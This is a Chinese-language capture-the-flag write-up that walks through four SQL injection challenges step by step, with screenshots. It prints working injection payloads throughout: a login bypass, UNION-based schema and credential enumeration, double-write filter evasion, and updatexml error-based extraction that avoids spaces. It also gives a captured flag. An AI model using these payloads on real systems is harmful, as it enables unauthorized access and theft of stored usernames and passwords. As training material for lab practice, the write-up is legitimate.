小白一个,记录一下解题过程,如有错误请指正!
一、EasySQL
1.这里我们使用一句话万能密码就可以了,记得加上#
1' or '1'='1'#
![](https://img-blog.csdnimg.cn/d6363f467ecb4b8d91ab90f41b875c93.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_10,color_FFFFFF,t_70,g_se,x_16)
2.登录就可以拿到flag
二、LoveSQL
网页里说用sqlmap是没有灵魂滴,但是还是手痒试了一下,发现什么都扫不出来,可能是我太菜了能力还没到家,希望有大佬能指点一下~
1.我们只能运用灵魂了,用万能句尝试一下,发现登录进来了,但是没有flag
![](https://img-blog.csdnimg.cn/9b465fa9fd32459aa8d4992c5d0d8f73.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_20,color_FFFFFF,t_70,g_se,x_16)
2.猜测flag应该是放在某个字段里了,我们用联合注入(union)看一下列数
1' union select 1,2,3#
![](https://img-blog.csdnimg.cn/b40a202b3f404471aaa6035d6c6dc7e4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_13,color_FFFFFF,t_70,g_se,x_16)
登录成功,列数再加1,发现报错了,说明列数有三列,第二第三列有回显
1' union select 1,2,3,4#
![](https://img-blog.csdnimg.cn/75db06a1bfc1441a9cd0676cec5e3268.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_20,color_FFFFFF,t_70,g_se,x_16)
3.开始爆数据库
1' union select 1,2,database()#
![](https://img-blog.csdnimg.cn/60d6908fe10b43f6bebb78550cebbf70.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_16,color_FFFFFF,t_70,g_se,x_16)
4.数据库名为geek,爆表名
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#
![](https://img-blog.csdnimg.cn/7f3dca027f6b44fe8be1691dc4c247cd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_18,color_FFFFFF,t_70,g_se,x_16)
5.很显然l0ve1ysq1是我们想要的表,谁让他和题目长得很像呢~,爆字段
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
![](https://img-blog.csdnimg.cn/03514d361aea422da9a240e538398c82.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_19,color_FFFFFF,t_70,g_se,x_16)
6.flag应该在username或者password里了,用concat_ws函数连起来全部看一下。
1' union select 1,2,group_concat(concat_ws('~',username,password)) from geek.l0ve1ysq1#
![](https://img-blog.csdnimg.cn/352f8ebfb3004ca9852af9c414756c9a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_20,color_FFFFFF,t_70,g_se,x_16)
太长了看不完,直接看网页源代码即可
![](https://img-blog.csdnimg.cn/0d339fdb537e46a3a053c154aea2115d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_9,color_FFFFFF,t_70,g_se,x_16)
三、BabySQL
1.还是先用万能句试一下,发现不行了,应该是设置了关键字过滤,用burp看一下过滤了那些关键字
![](https://img-blog.csdnimg.cn/04a3cb9cfa1849fca40ac3eef5c367b2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_15,color_FFFFFF,t_70,g_se,x_16)
or,and,union,select,where等都被过滤了,试了一下改大小写,双写,发现双写注入是可以的
1' oorr '1'='1'#
![](https://img-blog.csdnimg.cn/491c35be9a0541a7bf1ce638c1b28b25.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_20,color_FFFFFF,t_70,g_se,x_16)
2.那我们就是用双写注入,查一下列数,发现还是只有三列
1' ununionion selselectect 1,2,3#
![](https://img-blog.csdnimg.cn/277aa6c93e8c4f9fb4c25a619c7568b9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_14,color_FFFFFF,t_70,g_se,x_16)
3.爆数据库
1' ununionion selselectect 1,2,database()#
![](https://img-blog.csdnimg.cn/6b403901488e4796832d589efba25dee.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_13,color_FFFFFF,t_70,g_se,x_16)
4.熟悉的数据库名,开始爆表名
1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#
![](https://img-blog.csdnimg.cn/ba4cd36343fc405a9d82d98c2d582e8e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_17,color_FFFFFF,t_70,g_se,x_16)
5.爆字段
1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#
![](https://img-blog.csdnimg.cn/c4becc06f19540acab9c6d2672b78aa0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_18,color_FFFFFF,t_70,g_se,x_16)
6.查看username,password两个字段
1' ununionion selselectect 1,2,group_concat(concat_ws('~',username,passwoorrd)) frfromom geek.b4bsql#
![](https://img-blog.csdnimg.cn/07f4883d50a94a9783b32afea6f18409.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_20,color_FFFFFF,t_70,g_se,x_16)
7.查看网页源代码就可以看到完整的flag了
![](https://img-blog.csdnimg.cn/3e81e6905efb482aa3b5c7c59d64164b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_13,color_FFFFFF,t_70,g_se,x_16)
四、HardSQL
1.在这一题发现万能句,双写都不能用了,总是出现这样一个页面
![](https://img-blog.csdnimg.cn/f91a2497c1c24b058183abaa84c7465b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_20,color_FFFFFF,t_70,g_se,x_16)
2.应该还是把某些关键字过滤掉了,用burp再fuzz一下,发现空格,union,*,=都被过滤了,但是updatexml和extractvalue没被过滤,可以考虑使用报错注入
![](https://img-blog.csdnimg.cn/ba9ffc2bca5f4f8ba9e0d58ed0d55dc3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_20,color_FFFFFF,t_70,g_se,x_16)
3.因为空格和*号都被过滤掉了,就不能使用/**/绕过空格了,不过可以使用()绕过,爆数据库
1'or(updatexml(1,concat('~',(select(database()))),1))#
![](https://img-blog.csdnimg.cn/e9ed578463f14ac7bd376a6c9973a765.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_11,color_FFFFFF,t_70,g_se,x_16)
4.又是熟悉的数据库名,开始爆表名
1'or(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('%geek%'))),1))#
![](https://img-blog.csdnimg.cn/a66d8964eba142e6a1afb5500feb100f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_12,color_FFFFFF,t_70,g_se,x_16)
5.爆字段
1'or(updatexml(1,concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('%H4rDsq1%'))),1))#
![](https://img-blog.csdnimg.cn/5c3bfb40eda94669b494ad6ab0251ef5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_14,color_FFFFFF,t_70,g_se,x_16)
6.查看username,password ,不过根据经验应该是在password里是没错了
1'or(updatexml(1,concat('~',(select(group_concat(concat_ws('~',username,password)))from(geek.H4rDsq1))),1))#
![](https://img-blog.csdnimg.cn/5c0cf6e1f91148b694c88aaa485eeda4.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_17,color_FFFFFF,t_70,g_se,x_16)
7.没显示完全,因为updatexml函数只能显示前32位,但是mid,substr函数也被过滤掉了,那可以使用right函数
1'or(updatexml(1,concat('~',(select(right(concat_ws('~',username,password),30))from(geek.H4rDsq1))),1))#
![](https://img-blog.csdnimg.cn/61b9576e45274a9abb6899bc4f255733.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2VpeGluXzQ4Nzk5MTU3,size_16,color_FFFFFF,t_70,g_se,x_16)
8.拼起来就是flag啦
flag{651cd7be-7e7e-4463-9bee-9b451fc0039d}
参考文章:
https://cloud.tencent.com/developer/article/1740429
https://www.cnblogs.com/Mr-small/p/13473910.html
https://www.cnblogs.com/sipc-love/p/14266070.html